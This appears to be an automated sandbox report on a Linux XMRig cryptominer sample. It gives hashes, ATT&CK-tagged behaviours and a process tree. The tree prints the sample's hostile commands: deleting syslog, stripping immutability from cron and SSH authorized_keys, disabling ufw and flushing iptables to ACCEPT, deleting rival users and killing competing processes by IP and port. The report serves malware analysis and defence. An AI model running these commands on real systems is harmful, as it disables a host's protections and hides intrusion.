xmrig_linux | 3c0e677024ea8554a0eed96c62ef39549cefebb44937d9c778926daac67d5495

Analysis

max time kernel
149s
max time network
143s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240508-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240508-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
27-09-2024 13:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fa8008ca091d7d984279655e9bc577d8_JaffaCakes118
Size

30KB
MD5

fa8008ca091d7d984279655e9bc577d8
SHA1

2cb21f9e3473a1fb6e3718b2018d6eea5f6f5020
SHA256

3c0e677024ea8554a0eed96c62ef39549cefebb44937d9c778926daac67d5495
SHA512

138f3847581ed8730764453da36c9555dd669e0bf5efc0c6f2433d443afeb4419cd6f190d97417dfa47a8cde3ab145e75664e96b16aad991ab5f10bf8204d9db
SSDEEP

384:p7pQBDf6jlpTWg3vMGQiirhHwMyGj4CC9vEKMvU/4Qdre21jT58vKpG2Y0orcfKS:p78zQ5VFNcDAFLcIwgnoYq0xFBVZHttn

Score

10^/10

xmrig_linux defense_evasion discovery evasion miner privilege_escalation rootkit

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig_linux
File and Directory Permissions Modification 1 TTPs 3 IoCs
Adversaries may modify file or directory permissions to evade defenses.
defense_evasion

Linux and Mac File and Directory Permissions Modification
T1222.002

Processes:

pid process

3126
3130
3135
Deletes system logs 1 TTPs 1 IoCs
Deletes log file which contains global system messages. Adversaries may delete system logs to minimize their footprint.
evasion

Clear Linux or Mac System Logs
T1070.002

Processes:

rm

description ioc process

File deleted /var/log/syslog rm
Flushes firewall rules 1 TTPs 3 IoCs
Flushes/ disables firewall rules inside the Linux kernel.
defense_evasion

Disable or Modify System Firewall
T1562.004

Processes:

ufwiptables

pid process

1532 ufw
1707 iptables
3075
Loads a kernel module 1 IoCs
Loads a Linux kernel module, potentially to achieve persistence
rootkit

Processes:

modprobe

ioc pid process

/lib/modules/4.15.0-213-generic/kernel/net/ipv6/netfilter/ip6_tables.ko 1536 modprobe
Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs
Abuse sudo or cached sudo credentials to execute code.
privilege_escalation defense_evasion

Sudo and Sudo Caching
T1548.003

Processes:

sudo

pid process

1708 sudo

pid	process
3126
3130
3135

description	ioc	process
File deleted	/var/log/syslog	rm

pid	process
1532	ufw
1707	iptables
3075

ioc	pid	process
/lib/modules/4.15.0-213-generic/kernel/net/ipv6/netfilter/ip6_tables.ko	1536	modprobe

pid	process
1708	sudo

Attempts to change immutable files 64 IoCs

Modifies inode attributes on the filesystem to allow changing of immutable files.

Processes:

xargsxargsxargsxargschattrxargsxargsip6tableschattrxargsxargsxargsxargsxargsxargsiptablesxargsxargsxargsiptablesiptablesip6tablesip6tableschattrxargsxargsxargsxargsxargsiptablesiptablesip6tablesgrepxargsxargsiptablesxargsxargsxargsxargsip6tablesxargsxargsxargsxargsxargsxargsxargsip6tablesip6tablesxargsxargs

pid	process
1913	xargs
2119	xargs
2382	xargs
2511	xargs
1529	chattr
2227	xargs
2459	xargs
2909
1666	ip6tables
1721	chattr
2034	xargs
2143	xargs
2202	xargs
2318	xargs
2616
2531	xargs
2536	xargs
1556	iptables
1928	xargs
1959	xargs
2232	xargs
1554	iptables
1588	iptables
1669	ip6tables
1701	ip6tables
1528	chattr
1828	xargs
2019	xargs
2612
1840	xargs
1848	xargs
2165	xargs
2716
3012
1568	iptables
1589	iptables
1681	ip6tables
1728	grep
1944	xargs
2551	xargs
1557	iptables
2138	xargs
2577
2303	xargs
2601
1893	xargs
2197	xargs
2676
2680
2720
1665	ip6tables
1792	xargs
1865	xargs
1989	xargs
1898	xargs
2049	xargs
2059	xargs
2654
3000
2471	xargs
1634	ip6tables
1649	ip6tables
1923	xargs
1938	xargs

Disables AppArmor 28 IoCs
Disables AppArmor security module.

Processes:

pid process

3054
3054
3074
3079
3085
3074
3074
3099
3085
3085
3067
3079
3054
3054
3074
3085
3085
3054
3079
3079
3091
3074
3079
3085
3054
3074
3079
3089
Disables SELinux 1 TTPs 1 IoCs
Disables SELinux security module.
defense_evasion

Disable or Modify Tools
T1562.001

Processes:

pid process

3053
Enumerates running processes
Discovers information about currently running processes on the system
Changes its process name 1 IoCs

Processes:

description ioc pid process

Changes the process name, possibly in an attempt to hide itself (sysv-install) 3071

pid	process
3054
3054
3074
3079
3085
3074
3074
3099
3085
3085
3067
3079
3054
3054
3074
3085
3085
3054
3079
3079
3091
3074
3079
3085
3054
3074
3079
3089

pid	process
3053

description	ioc	pid	process
Changes the process name, possibly in an attempt to hide itself	(sysv-install)	3071

Reads CPU attributes 1 TTPs 64 IoCs

discovery

System Information Discovery

T1082

Processes:

pspspspkillpspspspspspspspspskillpspspspspspspspspspspspspspspspspspspsps

description	ioc	process
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online

Enumerates kernel/hardware configuration 1 TTPs 2 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
discovery

System Information Discovery
T1082

Processes:

modprobe

description ioc process

File opened for reading /sys/module/ip6_tables/initstate modprobe
File opened for reading /sys/module/x_tables/initstate modprobe

description	ioc	process
File opened for reading	/sys/module/ip6_tables/initstate	modprobe
File opened for reading	/sys/module/x_tables/initstate	modprobe

Process Discovery 1 TTPs 64 IoCs

Adversaries may try to discover information about running processes.

discovery

Process Discovery

T1057

Processes:

pspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspsps

pid	process
2344	ps
1849	ps
2045	ps
2258	ps
2472	ps
2482	ps
1844	ps
1975	ps
2166	ps
2040	ps
2144	ps
2223	ps
1970	ps
1980	ps
2035	ps
2208	ps
2238	ps
2365	ps
2395	ps
1899	ps
2110	ps
2134	ps
1945	ps
2383	ps
2454	ps
2183	ps
2477	ps
1914	ps
2442	ps
2466	ps
2412	ps
1929	ps
2203	ps
2377	ps
2139	ps
2161	ps
2243	ps
1909	ps
2070	ps
2095	ps
2248	ps
2304	ps
2389	ps
1995	ps
2065	ps
2100	ps
2286	ps
2314	ps
2154	ps
2418	ps
1725	ps
2005	ps
2085	ps
3103
2309	ps
2460	ps
2487	ps
2090	ps
2218	ps
2000	ps
2020	ps
2060	ps
2213	ps
1950	ps

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

pspspspspspspspspspspspspspspspspspspspspspspspspspspspspspsps

description	ioc	process
File opened for reading	/proc/1199/status	ps
File opened for reading	/proc/2259/status	ps
File opened for reading	/proc/10/stat	ps
File opened for reading	/proc/1042/status	ps
File opened for reading	/proc/84/status
File opened for reading	/proc/978/status	ps
File opened for reading	/proc/1350/cmdline	ps
File opened for reading	/proc/1/stat	ps
File opened for reading	/proc/173/status	ps
File opened for reading	/proc/162/status	ps
File opened for reading	/proc/1042/stat	ps
File opened for reading	/proc/30/status
File opened for reading	/proc/1129/status	ps
File opened for reading	/proc/1152/cmdline	ps
File opened for reading	/proc/203/cmdline
File opened for reading	/proc/1157/cmdline
File opened for reading	/proc/1350/stat	ps
File opened for reading	/proc/14/stat	ps
File opened for reading	/proc/1211/cmdline	ps
File opened for reading	/proc/621/cmdline
File opened for reading	/proc/311/cmdline
File opened for reading	/proc/972/cmdline
File opened for reading	/proc/317/cmdline	ps
File opened for reading	/proc/8/stat	ps
File opened for reading	/proc/10/status	ps
File opened for reading	/proc/1140/status	ps
File opened for reading	/proc/171/status
File opened for reading	/proc/1207/status
File opened for reading	/proc/1520/status
File opened for reading	/proc/173/cmdline	ps
File opened for reading	/proc/978/status	ps
File opened for reading	/proc/1203/status
File opened for reading	/proc/486/cmdline	ps
File opened for reading	/proc/168/cmdline
File opened for reading	/proc/1136/cmdline
File opened for reading	/proc/1140/cmdline
File opened for reading	/proc/20/status
File opened for reading	/proc/414/stat	ps
File opened for reading	/proc/486/status	ps
File opened for reading	/proc/36/cmdline
File opened for reading	/proc/158/cmdline
File opened for reading	/proc/1202/cmdline
File opened for reading	/proc/6/status
File opened for reading	/proc/1526/stat	ps
File opened for reading	/proc/268/status	ps
File opened for reading	/proc/115/cmdline
File opened for reading	/proc/85/cmdline
File opened for reading	/proc/6/cmdline
File opened for reading	/proc/177/status
File opened for reading	/proc/1004/cmdline	ps
File opened for reading	/proc/24/stat	ps
File opened for reading	/proc/414/cmdline
File opened for reading	/proc/13/cmdline	ps
File opened for reading	/proc/27/stat	ps
File opened for reading	/proc/15/cmdline
File opened for reading	/proc/1309/cmdline
File opened for reading	/proc/461/status
File opened for reading	/proc/3/status
File opened for reading	/proc/1246/stat	ps
File opened for reading	/proc/1526/stat
File opened for reading	/proc/965/cmdline	ps
File opened for reading	/proc/12/status
File opened for reading	/proc/452/cmdline
File opened for reading	/proc/3114/cmdline

System Network Configuration Discovery 1 TTPs 5 IoCs
Adversaries may gather information about the network configuration of a system.
discovery

System Network Configuration Discovery
T1016

Processes:

modprobegrepgrepgrep

pid process

1536 modprobe
2087 grep
2117 grep
2331 grep
2871
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.

Processes:

fa8008ca091d7d984279655e9bc577d8_JaffaCakes118

description ioc process

File opened for modification /tmp/log_rot fa8008ca091d7d984279655e9bc577d8_JaffaCakes118

pid	process
1536	modprobe
2087	grep
2117	grep
2331	grep
2871

description	ioc	process
File opened for modification	/tmp/log_rot	fa8008ca091d7d984279655e9bc577d8_JaffaCakes118

/tmp/fa8008ca091d7d984279655e9bc577d8_JaffaCakes118
/tmp/fa8008ca091d7d984279655e9bc577d8_JaffaCakes118
1⤵
- Writes file to tmp directory
PID:1526

/bin/rm
rm -rf /var/log/syslog
2⤵
- Deletes system logs
PID:1527

/usr/bin/chattr
chattr -iua /tmp/
2⤵
- Attempts to change immutable files
PID:1528

/usr/bin/chattr
chattr -iua /var/tmp/
2⤵
- Attempts to change immutable files
PID:1529

/usr/bin/chattr
chattr -R -i /var/spool/cron
2⤵
PID:1530

/usr/bin/chattr
chattr -i /etc/crontab
2⤵
PID:1531

/usr/sbin/ufw
ufw disable
2⤵
- Flushes firewall rules
PID:1532

/sbin/iptables
/sbin/iptables -V
3⤵
PID:1533

/lib/ufw/ufw-init
/lib/ufw/ufw-init force-stop
3⤵
PID:1534

/sbin/ip6tables
ip6tables -L INPUT -n
4⤵
PID:1535

/sbin/modprobe
/sbin/modprobe ip6_tables
5⤵
- Loads a kernel module
- Enumerates kernel/hardware configuration
- System Network Configuration Discovery
PID:1536

/sbin/iptables
iptables -F ufw-logging-deny
4⤵
PID:1543

/sbin/iptables
iptables -F ufw-logging-allow
4⤵
PID:1546

/sbin/iptables
iptables -F ufw-not-local
4⤵
PID:1547

/sbin/iptables
iptables -F ufw-user-logging-input
4⤵
PID:1548

/sbin/iptables
iptables -F ufw-user-limit-accept
4⤵
PID:1549

/sbin/iptables
iptables -F ufw-user-limit
4⤵
PID:1550

/sbin/iptables
iptables -F ufw-skip-to-policy-input
4⤵
PID:1551

/sbin/iptables
iptables -F ufw-reject-input
4⤵
PID:1552

/sbin/iptables
iptables -F ufw-after-logging-input
4⤵
PID:1553

/sbin/iptables
iptables -F ufw-after-input
4⤵
- Attempts to change immutable files
PID:1554

/sbin/iptables
iptables -F ufw-user-input
4⤵
PID:1555

/sbin/iptables
iptables -F ufw-before-input
4⤵
- Attempts to change immutable files
PID:1556

/sbin/iptables
iptables -F ufw-before-logging-input
4⤵
- Attempts to change immutable files
PID:1557

/sbin/iptables
iptables -F ufw-skip-to-policy-forward
4⤵
PID:1558

/sbin/iptables
iptables -F ufw-reject-forward
4⤵
PID:1559

/sbin/iptables
iptables -F ufw-after-logging-forward
4⤵
PID:1560

/sbin/iptables
iptables -F ufw-after-forward
4⤵
PID:1561

/sbin/iptables
iptables -F ufw-user-logging-forward
4⤵
PID:1562

/sbin/iptables
iptables -F ufw-user-forward
4⤵
PID:1563

/sbin/iptables
iptables -F ufw-before-forward
4⤵
PID:1564

/sbin/iptables
iptables -F ufw-before-logging-forward
4⤵
PID:1565

/sbin/iptables
iptables -F ufw-track-forward
4⤵
PID:1566

/sbin/iptables
iptables -F ufw-track-output
4⤵
PID:1567

/sbin/iptables
iptables -F ufw-track-input
4⤵
- Attempts to change immutable files
PID:1568

/sbin/iptables
iptables -F ufw-skip-to-policy-output
4⤵
PID:1569

/sbin/iptables
iptables -F ufw-reject-output
4⤵
PID:1570

/sbin/iptables
iptables -F ufw-after-logging-output
4⤵
PID:1571

/sbin/iptables
iptables -F ufw-after-output
4⤵
PID:1572

/sbin/iptables
iptables -F ufw-user-logging-output
4⤵
PID:1573

/sbin/iptables
iptables -F ufw-user-output
4⤵
PID:1574

/sbin/iptables
iptables -F ufw-before-output
4⤵
PID:1575

/sbin/iptables
iptables -F ufw-before-logging-output
4⤵
PID:1576

/sbin/iptables
iptables -Z ufw-logging-deny
4⤵
PID:1577

/sbin/iptables
iptables -Z ufw-logging-allow
4⤵
PID:1578

/sbin/iptables
iptables -Z ufw-not-local
4⤵
PID:1579

/sbin/iptables
iptables -Z ufw-user-logging-input
4⤵
PID:1580

/sbin/iptables
iptables -Z ufw-user-limit-accept
4⤵
PID:1581

/sbin/iptables
iptables -Z ufw-user-limit
4⤵
PID:1582

/sbin/iptables
iptables -Z ufw-skip-to-policy-input
4⤵
PID:1583

/sbin/iptables
iptables -Z ufw-reject-input
4⤵
PID:1584

/sbin/iptables
iptables -Z ufw-after-logging-input
4⤵
PID:1585

/sbin/iptables
iptables -Z ufw-after-input
4⤵
PID:1586

/sbin/iptables
iptables -Z ufw-user-input
4⤵
PID:1587

/sbin/iptables
iptables -Z ufw-before-input
4⤵
- Attempts to change immutable files
PID:1588

/sbin/iptables
iptables -Z ufw-before-logging-input
4⤵
- Attempts to change immutable files
PID:1589

/sbin/iptables
iptables -Z ufw-skip-to-policy-forward
4⤵
PID:1590

/sbin/iptables
iptables -Z ufw-reject-forward
4⤵
PID:1591

/sbin/iptables
iptables -Z ufw-after-logging-forward
4⤵
PID:1592

/sbin/iptables
iptables -Z ufw-after-forward
4⤵
PID:1593

/sbin/iptables
iptables -Z ufw-user-logging-forward
4⤵
PID:1594

/sbin/iptables
iptables -Z ufw-user-forward
4⤵
PID:1595

/sbin/iptables
iptables -Z ufw-before-forward
4⤵
PID:1596

/sbin/iptables
iptables -Z ufw-before-logging-forward
4⤵
PID:1597

/sbin/iptables
iptables -Z ufw-track-forward
4⤵
PID:1598

/sbin/iptables
iptables -Z ufw-track-output
4⤵
PID:1599

/sbin/iptables
iptables -Z ufw-track-input
4⤵
PID:1600

/sbin/iptables
iptables -Z ufw-skip-to-policy-output
4⤵
PID:1601

/sbin/iptables
iptables -Z ufw-reject-output
4⤵
PID:1602

/sbin/iptables
iptables -Z ufw-after-logging-output
4⤵
PID:1603

/sbin/iptables
iptables -Z ufw-after-output
4⤵
PID:1604

/sbin/iptables
iptables -Z ufw-user-logging-output
4⤵
PID:1605

/sbin/iptables
iptables -Z ufw-user-output
4⤵
PID:1606

/sbin/iptables
iptables -Z ufw-before-output
4⤵
PID:1607

/sbin/iptables
iptables -Z ufw-before-logging-output
4⤵
PID:1608

/sbin/iptables
iptables -X ufw-logging-deny
4⤵
PID:1609

/sbin/iptables
iptables -X ufw-logging-allow
4⤵
PID:1610

/sbin/iptables
iptables -X ufw-not-local
4⤵
PID:1611

/sbin/iptables
iptables -X ufw-user-logging-input
4⤵
PID:1612

/sbin/iptables
iptables -X ufw-user-logging-output
4⤵
PID:1613

/sbin/iptables
iptables -X ufw-user-logging-forward
4⤵
PID:1614

/sbin/iptables
iptables -X ufw-user-limit-accept
4⤵
PID:1615

/sbin/iptables
iptables -X ufw-user-limit
4⤵
PID:1616

/sbin/iptables
iptables -X ufw-user-input
4⤵
PID:1617

/sbin/iptables
iptables -X ufw-user-forward
4⤵
PID:1618

/sbin/iptables
iptables -X ufw-user-output
4⤵
PID:1619

/sbin/iptables
iptables -X ufw-skip-to-policy-input
4⤵
PID:1620

/sbin/iptables
iptables -X ufw-skip-to-policy-output
4⤵
PID:1621

/sbin/iptables
iptables -X ufw-skip-to-policy-forward
4⤵
PID:1622

/sbin/iptables
iptables -P INPUT ACCEPT
4⤵
PID:1623

/sbin/iptables
iptables -P OUTPUT ACCEPT
4⤵
PID:1624

/sbin/iptables
iptables -P FORWARD ACCEPT
4⤵
PID:1625

/sbin/ip6tables
ip6tables -F ufw6-logging-deny
4⤵
PID:1626

/sbin/ip6tables
ip6tables -F ufw6-logging-allow
4⤵
PID:1627

/sbin/ip6tables
ip6tables -F ufw6-not-local
4⤵
PID:1628

/sbin/ip6tables
ip6tables -F ufw6-user-logging-input
4⤵
PID:1629

/sbin/ip6tables
ip6tables -F ufw6-user-limit-accept
4⤵
PID:1630

/sbin/ip6tables
ip6tables -F ufw6-user-limit
4⤵
PID:1631

/sbin/ip6tables
ip6tables -F ufw6-skip-to-policy-input
4⤵
PID:1632

/sbin/ip6tables
ip6tables -F ufw6-reject-input
4⤵
PID:1633

/sbin/ip6tables
ip6tables -F ufw6-after-logging-input
4⤵
- Attempts to change immutable files
PID:1634

/sbin/ip6tables
ip6tables -F ufw6-after-input
4⤵
PID:1635

/sbin/ip6tables
ip6tables -F ufw6-user-input
4⤵
PID:1636

/sbin/ip6tables
ip6tables -F ufw6-before-input
4⤵
PID:1637

/sbin/ip6tables
ip6tables -F ufw6-before-logging-input
4⤵
PID:1638

/sbin/ip6tables
ip6tables -F ufw6-skip-to-policy-forward
4⤵
PID:1639

/sbin/ip6tables
ip6tables -F ufw6-reject-forward
4⤵
PID:1640

/sbin/ip6tables
ip6tables -F ufw6-after-logging-forward
4⤵
PID:1641

/sbin/ip6tables
ip6tables -F ufw6-after-forward
4⤵
PID:1642

/sbin/ip6tables
ip6tables -F ufw6-user-logging-forward
4⤵
PID:1643

/sbin/ip6tables
ip6tables -F ufw6-user-forward
4⤵
PID:1644

/sbin/ip6tables
ip6tables -F ufw6-before-forward
4⤵
PID:1645

/sbin/ip6tables
ip6tables -F ufw6-before-logging-forward
4⤵
PID:1646

/sbin/ip6tables
ip6tables -F ufw6-track-forward
4⤵
PID:1647

/sbin/ip6tables
ip6tables -F ufw6-track-output
4⤵
PID:1648

/sbin/ip6tables
ip6tables -F ufw6-track-input
4⤵
- Attempts to change immutable files
PID:1649

/sbin/ip6tables
ip6tables -F ufw6-skip-to-policy-output
4⤵
PID:1650

/sbin/ip6tables
ip6tables -F ufw6-reject-output
4⤵
PID:1651

/sbin/ip6tables
ip6tables -F ufw6-after-logging-output
4⤵
PID:1652

/sbin/ip6tables
ip6tables -F ufw6-after-output
4⤵
PID:1653

/sbin/ip6tables
ip6tables -F ufw6-user-logging-output
4⤵
PID:1654

/sbin/ip6tables
ip6tables -F ufw6-user-output
4⤵
PID:1655

/sbin/ip6tables
ip6tables -F ufw6-before-output
4⤵
PID:1656

/sbin/ip6tables
ip6tables -F ufw6-before-logging-output
4⤵
PID:1657

/sbin/ip6tables
ip6tables -Z ufw6-logging-deny
4⤵
PID:1658

/sbin/ip6tables
ip6tables -Z ufw6-logging-allow
4⤵
PID:1659

/sbin/ip6tables
ip6tables -Z ufw6-not-local
4⤵
PID:1660

/sbin/ip6tables
ip6tables -Z ufw6-user-logging-input
4⤵
PID:1661

/sbin/ip6tables
ip6tables -Z ufw6-user-limit-accept
4⤵
PID:1662

/sbin/ip6tables
ip6tables -Z ufw6-user-limit
4⤵
PID:1663

/sbin/ip6tables
ip6tables -Z ufw6-skip-to-policy-input
4⤵
PID:1664

/sbin/ip6tables
ip6tables -Z ufw6-reject-input
4⤵
- Attempts to change immutable files
PID:1665

/sbin/ip6tables
ip6tables -Z ufw6-after-logging-input
4⤵
- Attempts to change immutable files
PID:1666

/sbin/ip6tables
ip6tables -Z ufw6-after-input
4⤵
PID:1667

/sbin/ip6tables
ip6tables -Z ufw6-user-input
4⤵
PID:1668

/sbin/ip6tables
ip6tables -Z ufw6-before-input
4⤵
- Attempts to change immutable files
PID:1669

/sbin/ip6tables
ip6tables -Z ufw6-before-logging-input
4⤵
PID:1670

/sbin/ip6tables
ip6tables -Z ufw6-skip-to-policy-forward
4⤵
PID:1671

/sbin/ip6tables
ip6tables -Z ufw6-reject-forward
4⤵
PID:1672

/sbin/ip6tables
ip6tables -Z ufw6-after-logging-forward
4⤵
PID:1673

/sbin/ip6tables
ip6tables -Z ufw6-after-forward
4⤵
PID:1674

/sbin/ip6tables
ip6tables -Z ufw6-user-logging-forward
4⤵
PID:1675

/sbin/ip6tables
ip6tables -Z ufw6-user-forward
4⤵
PID:1676

/sbin/ip6tables
ip6tables -Z ufw6-before-forward
4⤵
PID:1677

/sbin/ip6tables
ip6tables -Z ufw6-before-logging-forward
4⤵
PID:1678

/sbin/ip6tables
ip6tables -Z ufw6-track-forward
4⤵
PID:1679

/sbin/ip6tables
ip6tables -Z ufw6-track-output
4⤵
PID:1680

/sbin/ip6tables
ip6tables -Z ufw6-track-input
4⤵
- Attempts to change immutable files
PID:1681

/sbin/ip6tables
ip6tables -Z ufw6-skip-to-policy-output
4⤵
PID:1682

/sbin/ip6tables
ip6tables -Z ufw6-reject-output
4⤵
PID:1683

/sbin/ip6tables
ip6tables -Z ufw6-after-logging-output
4⤵
PID:1684

/sbin/ip6tables
ip6tables -Z ufw6-after-output
4⤵
PID:1685

/sbin/ip6tables
ip6tables -Z ufw6-user-logging-output
4⤵
PID:1686

/sbin/ip6tables
ip6tables -Z ufw6-user-output
4⤵
PID:1687

/sbin/ip6tables
ip6tables -Z ufw6-before-output
4⤵
PID:1688

/sbin/ip6tables
ip6tables -Z ufw6-before-logging-output
4⤵
PID:1689

/sbin/ip6tables
ip6tables -X ufw6-logging-deny
4⤵
PID:1690

/sbin/ip6tables
ip6tables -X ufw6-logging-allow
4⤵
PID:1691

/sbin/ip6tables
ip6tables -X ufw6-not-local
4⤵
PID:1692

/sbin/ip6tables
ip6tables -X ufw6-user-logging-input
4⤵
PID:1693

/sbin/ip6tables
ip6tables -X ufw6-user-logging-output
4⤵
PID:1694

/sbin/ip6tables
ip6tables -X ufw6-user-logging-forward
4⤵
PID:1695

/sbin/ip6tables
ip6tables -X ufw6-user-limit-accept
4⤵
PID:1696

/sbin/ip6tables
ip6tables -X ufw6-user-limit
4⤵
PID:1697

/sbin/ip6tables
ip6tables -X ufw6-user-input
4⤵
PID:1698

/sbin/ip6tables
ip6tables -X ufw6-user-forward
4⤵
PID:1699

/sbin/ip6tables
ip6tables -X ufw6-user-output
4⤵
PID:1700

/sbin/ip6tables
ip6tables -X ufw6-skip-to-policy-input
4⤵
- Attempts to change immutable files
PID:1701

/sbin/ip6tables
ip6tables -X ufw6-skip-to-policy-output
4⤵
PID:1702

/sbin/ip6tables
ip6tables -X ufw6-skip-to-policy-forward
4⤵
PID:1703

/sbin/ip6tables
ip6tables -P INPUT ACCEPT
4⤵
PID:1704

/sbin/ip6tables
ip6tables -P OUTPUT ACCEPT
4⤵
PID:1705

/sbin/ip6tables
ip6tables -P FORWARD ACCEPT
4⤵
PID:1706

/sbin/iptables
iptables -F
2⤵
- Flushes firewall rules
PID:1707

/usr/bin/sudo
sudo sysctl "kernel.nmi_watchdog=0"
2⤵
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
PID:1708

/usr/sbin/userdel
userdel akay
2⤵
PID:1712

/usr/sbin/userdel
userdel vfinder
2⤵
PID:1713

/usr/bin/chattr
chattr -iae /root/.ssh/
2⤵
PID:1720

/usr/bin/chattr
chattr -iae /root/.ssh/authorized_keys
2⤵
- Attempts to change immutable files
PID:1721

/bin/rm
rm -rf "/tmp/addres*"
2⤵
PID:1722

/bin/rm
rm -rf "/tmp/walle*"
2⤵
PID:1723

/bin/rm
rm -rf /tmp/keys
2⤵
PID:1724

/bin/grep
grep -i "[a]liyun"
2⤵
PID:1726

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1725

/bin/grep
grep -i "[y]unjing"
2⤵
- Attempts to change immutable files
PID:1728

/bin/ps
ps aux
2⤵
PID:1727

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1733

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1732

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1731

/bin/grep
grep 185.71.65.238
2⤵
PID:1730

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1738

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1737

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1736

/bin/grep
grep 140.82.52.87
2⤵
PID:1735

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1744

/bin/grep
grep -v -
2⤵
PID:1743

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1742

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1741

/bin/grep
grep :143
2⤵
PID:1740

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1750

/bin/grep
grep -v -
2⤵
PID:1749

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1748

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1747

/bin/grep
grep :2222
2⤵
PID:1746

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1756

/bin/grep
grep -v -
2⤵
PID:1755

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1754

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1753

/bin/grep
grep :3333
2⤵
PID:1752

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1762

/bin/grep
grep -v -
2⤵
PID:1761

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1760

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1759

/bin/grep
grep :3389
2⤵
PID:1758

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1768

/bin/grep
grep -v -
2⤵
PID:1767

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1766

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1765

/bin/grep
grep :4444
2⤵
PID:1764

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1774

/bin/grep
grep -v -
2⤵
PID:1773

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1772

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1771

/bin/grep
grep :5555
2⤵
PID:1770

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1780

/bin/grep
grep -v -
2⤵
PID:1779

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1778

/usr/bin/awk
awk "{print \$7}"
